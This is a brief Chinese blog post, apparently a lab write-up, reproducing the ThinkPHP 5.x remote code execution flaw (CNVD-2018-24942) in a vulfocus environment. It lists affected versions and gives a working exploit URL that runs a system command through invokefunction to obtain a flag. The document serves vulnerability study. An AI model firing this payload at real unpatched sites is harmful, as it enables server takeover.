ThinkPHP 5.x 远程代码执行漏洞复现（CNVD-2018-24942）

发表于 2020-09-28 更新于 2020-10-20 分类于漏洞复现阅读次数：
本文字数： 348 阅读时长 ≈ 1 分钟

漏洞描述

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。

上海顶想信息科技有限公司 ThinkPHP 5.*，<5.1.31

上海顶想信息科技有限公司 ThinkPHP <=5.0.23

使用 vulfocus 启动漏洞环境

访问页面如下：

1	/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp

直接访问拿到flag